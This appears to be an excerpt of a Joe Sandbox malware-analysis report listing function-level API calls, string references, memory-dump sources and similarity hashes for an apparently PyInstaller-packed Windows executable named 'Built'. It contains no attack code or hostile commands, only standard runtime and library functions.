API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 836932d6aed314119f7ddbe256598baef3b0bd20caf5fb751809a6c17d89e7ea
Instruction ID: 771e7dde8e166d8bec7d4528e78cc3a507dce73541a428a1b858dc762430242c
Opcode Fuzzy Hash: 836932d6aed314119f7ddbe256598baef3b0bd20caf5fb751809a6c17d89e7ea
Instruction Fuzzy Hash: B4315072708B8286EB609F61E860BED37A5FB84748F484039DB5D47AC8DF38D548CB10

Function 00007FFE101DAA58 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE101DAA74
RtlCaptureContext.KERNEL32 ref: 00007FFE101DAAA1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE101DAABB
RtlVirtualUnwind.KERNEL32 ref: 00007FFE101DAAFC
IsDebuggerPresent.KERNEL32 ref: 00007FFE101DAB50
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE101DAB71
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE101DAB7C

Memory Dump Source

Source File: 00000005.00000002.2109405337.00007FFE101D1000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFE101D0000, based on PE: true

Associated: 00000005.00000002.2109058392.00007FFE101D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109405337.00007FFE101E5000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109475898.00007FFE101E6000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109504920.00007FFE101E8000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe101d0000_Built.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1e09e7e5a03c670904396550837b2b7c286354a323edf1151ea734ff63ee77c8
Instruction ID: 874a2c17584115373a595f499c0e7e58acd073a5a95152fc88af5b7dc691922b
Opcode Fuzzy Hash: 1e09e7e5a03c670904396550837b2b7c286354a323edf1151ea734ff63ee77c8
Instruction Fuzzy Hash: 48313872709E818AEB609F61E8443E97365FB84754F84443ADB8E47BA8DF3CD649C710

Function 00007FF62664D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF62664D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF62664D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF62664D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF62664D240
IsDebuggerPresent.KERNEL32 ref: 00007FF62664D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF62664D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF62664D2BC

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: c40da157341b93ed3d445747ff0f812bf0ff7450512b2b97c9b108885229dc9c
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: CF312F72A08B8286EB609F60EC503EE73A4FB84744F44443ADA4D87B94EF7DD558DB12

Function 00007FF626665C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF626665CB5

Part of subcall function 00007FF626665608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666561C

Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8

Part of subcall function 00007FF62665A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62665A94F,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665A979
Part of subcall function 00007FF62665A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62665A94F,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665A99E

_get_daylight.LIBCMT ref: 00007FF626665CA4

Part of subcall function 00007FF626665668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666567C

_get_daylight.LIBCMT ref: 00007FF626665F1A
_get_daylight.LIBCMT ref: 00007FF626665F2B
_get_daylight.LIBCMT ref: 00007FF626665F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62666617C), ref: 00007FF626665F63

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: ae37007ee07be871dcb339d4716e81cd2b541fbdac04316a19f48e672b003f8e
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: 43D1AF32A0824386EF20AF26EC521B96751FF84794F548136EA0DC7696DF3EE441EB43

Function 00007FF62665A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF62665A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF62665A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF62665A750
IsDebuggerPresent.KERNEL32 ref: 00007FF62665A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF62665A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF62665A79E

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: a497083f80058113b1f8584c5be63a6774796f2cb0a83ccd19c71a0369f9f8ab
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 52315136618B8286DB60CF25EC402AE73A4FB89754F540136EA8D87B99EF3DD155CB02

Function 00007FF6266618E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626661930
FindFirstFileExW.KERNEL32 ref: 00007FF626661A3A

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction ID: 734c62f0ad5f04801d570b3fb5f6f8de8eb7da419233af1154954f4c061cf61f
Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction Fuzzy Hash: 58B1B522F1869741EE609B2AED101BDA390FB44BE4F445131EA5E87B85EE3EE445DB03

Function 00007FF626665EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF626665F1A

Part of subcall function 00007FF626665668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666567C

_get_daylight.LIBCMT ref: 00007FF626665F2B

Part of subcall function 00007FF626665608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666561C

_get_daylight.LIBCMT ref: 00007FF626665F3C

Part of subcall function 00007FF626665638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666564C

Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62666617C), ref: 00007FF626665F63

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction ID: 643c3a2fa5c58860cd54c0ea30182ad44a7f2ba777dd2e4a7e05ff81bd42bf5e
Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction Fuzzy Hash: 4E51A232A0864386EB10DF32FD915A96760FB88784F444136EA4DC76A6DF3EE4449F83

Function 00007FFDF0FA12F0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

00007FFDFA5B34D4.PYTHON310 ref: 00007FFDF0FA14DA

Strings

0, xrefs: 00007FFDF0FA1346

Memory Dump Source

Source File: 00000005.00000002.2090834885.00007FFDF0FA1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFDF0FA0000, based on PE: true

Associated: 00000005.00000002.2090802749.00007FFDF0FA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1004000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1050000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1053000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10AC000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10B1000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10B4000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2091138354.00007FFDF10B5000.00000080.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2091174931.00007FFDF10B7000.00000004.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf0fa0000_Built.jbxd

Similarity

API ID: 00007
String ID: 0
API String ID: 3568877910-4108050209
Opcode ID: 6a50bf60ee250f00c13c9b161c7141ec869bdc7ae2f0f3317bdfd56e8a990b19
Instruction ID: 825cf3deb4bd9dda2932af2feaa21d465a643a235176ebb762816500b4da5d4c
Opcode Fuzzy Hash: 6a50bf60ee250f00c13c9b161c7141ec869bdc7ae2f0f3317bdfd56e8a990b19
Instruction Fuzzy Hash: 57F1AE72F0C66286EB648B15956CE7A23A5FFD5B60F050235EA6E8B7C8DF6CE441C700

Function 00007FFDF10C2B5D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FFDF118A319
WSAGetLastError.WS2_32 ref: 00007FFDF118A328

Strings

..\s\crypto\bio\b_sock2.c, xrefs: 00007FFDF118A2CE, 00007FFDF118A33E, 00007FFDF118A35A

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: ErrorLastbind
String ID: ..\s\crypto\bio\b_sock2.c
API String ID: 2328862993-3200932406
Opcode ID: c767e834a84740a79c233dcad0d39ea44b2e2a28cfc1136448b175a4500b188a
Instruction ID: 9f3b8e0523d0742b9c06201be8e88a3aa304ec0fa46a1a5faae3cb7fd725449c
Opcode Fuzzy Hash: c767e834a84740a79c233dcad0d39ea44b2e2a28cfc1136448b175a4500b188a
Instruction Fuzzy Hash: 84219F32F1815286E710DB26E820AAD6768FB81B98F504235EA6D43BDDDF3DE546DF00

Function 00007FF626645820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645830
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645842
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645879
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664588B
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458A4
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458B6
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458CF
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458E1
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458FD
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664590F
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664592B
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664593D
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645959
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664596B
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645987
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645999
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266459B5
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266459C7

Strings

PyUnicode_FromString, xrefs: 00007FF626645F6B, 00007FF626645F8D
PySys_SetObject, xrefs: 00007FF626645E85, 00007FF626645EA7
PyErr_NormalizeException, xrefs: 00007FF626645AED, 00007FF626645B0F
PyErr_Clear, xrefs: 00007FF626645A91, 00007FF626645AB3
PyObject_CallFunctionObjArgs, xrefs: 00007FF626645D15, 00007FF626645D37
Py_InitializeFromConfig, xrefs: 00007FF6266458F3, 00007FF626645915
Py_PreInitialize, xrefs: 00007FF62664594F, 00007FF626645971
PyConfig_SetBytesString, xrefs: 00007FF626645A07, 00007FF626645A29
PyUnicode_FromFormat, xrefs: 00007FF626645F3D, 00007FF626645F5F
PyMarshal_ReadObjectFromString, xrefs: 00007FF626645C5D, 00007FF626645C7F
PyErr_Occurred, xrefs: 00007FF626645B1B, 00007FF626645B3D
PyModule_GetDict, xrefs: 00007FF626645CB9, 00007FF626645CDB
PyUnicode_DecodeFSDefault, xrefs: 00007FF626645F0F, 00007FF626645F31
PyImport_ExecCodeModule, xrefs: 00007FF626645C01, 00007FF626645C23
PyErr_Restore, xrefs: 00007FF626645B77, 00007FF626645B99
Failed to get address for %hs, xrefs: 00007FF626645851
PyObject_SetAttrString, xrefs: 00007FF626645D71, 00007FF626645D93
PyObject_CallFunction, xrefs: 00007FF626645CE7, 00007FF626645D09
PyRun_SimpleStringFlags, xrefs: 00007FF626645DFB, 00007FF626645E1D
PyConfig_Read, xrefs: 00007FF6266459D9, 00007FF6266459FB
PyConfig_SetWideStringList, xrefs: 00007FF626645A63, 00007FF626645A85
PyImport_ImportModule, xrefs: 00007FF626645C2F, 00007FF626645C51
Py_IsInitialized, xrefs: 00007FF626645921, 00007FF626645943
PyConfig_SetString, xrefs: 00007FF626645A35, 00007FF626645A57
PySys_GetObject, xrefs: 00007FF626645E57, 00007FF626645E79
PyImport_AddModule, xrefs: 00007FF626645BD3, 00007FF626645BF5
PyConfig_Clear, xrefs: 00007FF62664597D, 00007FF62664599F
Py_DecRef, xrefs: 00007FF626645826, 00007FF626645848
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF626645DCD, 00007FF626645DEF
Py_ExitStatusException, xrefs: 00007FF62664589A, 00007FF6266458BC
PyObject_Str, xrefs: 00007FF626645D9F, 00007FF626645DC1
GetProcAddress, xrefs: 00007FF626645858
PyUnicode_Decode, xrefs: 00007FF626645EE1, 00007FF626645F03
Py_DecodeLocale, xrefs: 00007FF62664586F, 00007FF626645891
PyEval_EvalCode, xrefs: 00007FF626645BA5, 00007FF626645BC7
PyMem_RawFree, xrefs: 00007FF626645C8B, 00007FF626645CAD
PyErr_Fetch, xrefs: 00007FF626645ABF, 00007FF626645AE1
PyStatus_Exception, xrefs: 00007FF626645E29, 00007FF626645E4B
PyErr_Print, xrefs: 00007FF626645B49, 00007FF626645B6B
PyUnicode_AsUTF8, xrefs: 00007FF626645EB3, 00007FF626645ED5
PyObject_GetAttrString, xrefs: 00007FF626645D43, 00007FF626645D65
PyUnicode_Replace, xrefs: 00007FF626645FC7, 00007FF626645FE9
PyUnicode_Join, xrefs: 00007FF626645F99, 00007FF626645FBB
Py_Finalize, xrefs: 00007FF6266458C5, 00007FF6266458E7
PyConfig_InitIsolatedConfig, xrefs: 00007FF6266459AB, 00007FF6266459CD

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: a3537bc7702626fedf611ebc0086da936d06d572064df9dc0e86523033db434b
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 1822C124A0EF47E2FE249B65BD241B427A5BF45785F445036C82E82260FF7EB158BB43

Function 00007FF6266476B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6266476C7
GetLastError.KERNEL32 ref: 00007FF6266476D9
GetProcAddress.KERNEL32 ref: 00007FF626647715
GetLastError.KERNEL32 ref: 00007FF626647727
GetProcAddress.KERNEL32 ref: 00007FF626647740
GetLastError.KERNEL32 ref: 00007FF626647752
GetProcAddress.KERNEL32 ref: 00007FF62664776B
GetLastError.KERNEL32 ref: 00007FF62664777D
GetProcAddress.KERNEL32 ref: 00007FF626647799
GetLastError.KERNEL32 ref: 00007FF6266477AB
GetProcAddress.KERNEL32 ref: 00007FF6266477C7
GetLastError.KERNEL32 ref: 00007FF6266477D9
GetProcAddress.KERNEL32 ref: 00007FF6266477F5
GetLastError.KERNEL32 ref: 00007FF626647807
GetProcAddress.KERNEL32 ref: 00007FF626647823
GetLastError.KERNEL32 ref: 00007FF626647835
GetProcAddress.KERNEL32 ref: 00007FF626647851
GetLastError.KERNEL32 ref: 00007FF626647863

Strings

Tcl_ConditionNotify, xrefs: 00007FF62664795B, 00007FF62664797D
Tk_GetNumMainWindows, xrefs: 00007FF626647C97, 00007FF626647CB9
Tcl_EvalFile, xrefs: 00007FF626647B83, 00007FF626647BA5
Tcl_CreateThread, xrefs: 00007FF626647819, 00007FF62664783B
Tcl_GetVar2, xrefs: 00007FF626647A13, 00007FF626647A35
Tcl_EvalEx, xrefs: 00007FF626647BB1, 00007FF626647BD3
Tcl_Init, xrefs: 00007FF6266476C0, 00007FF6266476DF
Tcl_CreateInterp, xrefs: 00007FF62664770B, 00007FF62664772D
Tcl_DeleteInterp, xrefs: 00007FF6266477EB, 00007FF62664780D
Tcl_MutexFinalize, xrefs: 00007FF6266478FF, 00007FF626647921
Tcl_ThreadAlert, xrefs: 00007FF6266479E5, 00007FF626647A07
Tcl_MutexUnlock, xrefs: 00007FF6266478D1, 00007FF6266478F3
Failed to get address for %hs, xrefs: 00007FF6266476E8
Tk_Init, xrefs: 00007FF626647C69, 00007FF626647C8B
Tcl_NewByteArrayObj, xrefs: 00007FF626647AF9, 00007FF626647B1B
Tcl_Alloc, xrefs: 00007FF626647C0D, 00007FF626647C2F
Tcl_ConditionWait, xrefs: 00007FF626647989, 00007FF6266479AB
Tcl_Finalize, xrefs: 00007FF62664778F, 00007FF6266477B1
Tcl_ConditionFinalize, xrefs: 00007FF62664792D, 00007FF62664794F
Tcl_GetObjResult, xrefs: 00007FF626647B55, 00007FF626647B77
Tcl_GetString, xrefs: 00007FF626647A9D, 00007FF626647ABF
GetProcAddress, xrefs: 00007FF6266476EF
Tcl_NewStringObj, xrefs: 00007FF626647ACB, 00007FF626647AED
Tcl_Free, xrefs: 00007FF626647C3B, 00007FF626647C5D
Tcl_GetCurrentThread, xrefs: 00007FF626647847, 00007FF626647869
Tcl_JoinThread, xrefs: 00007FF626647875, 00007FF626647897
Tcl_FindExecutable, xrefs: 00007FF626647736, 00007FF626647758
Tcl_MutexLock, xrefs: 00007FF6266478A3, 00007FF6266478C5
Tcl_CreateObjCommand, xrefs: 00007FF626647A6F, 00007FF626647A91
Tcl_FinalizeThread, xrefs: 00007FF6266477BD, 00007FF6266477DF
Tcl_SetVar2, xrefs: 00007FF626647A41, 00007FF626647A63
Tcl_DoOneEvent, xrefs: 00007FF626647761, 00007FF626647783
Tcl_SetVar2Ex, xrefs: 00007FF626647B27, 00007FF626647B49
Tcl_EvalObjv, xrefs: 00007FF626647BDF, 00007FF626647C01
Tcl_ThreadQueueEvent, xrefs: 00007FF6266479B7, 00007FF6266479D9

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
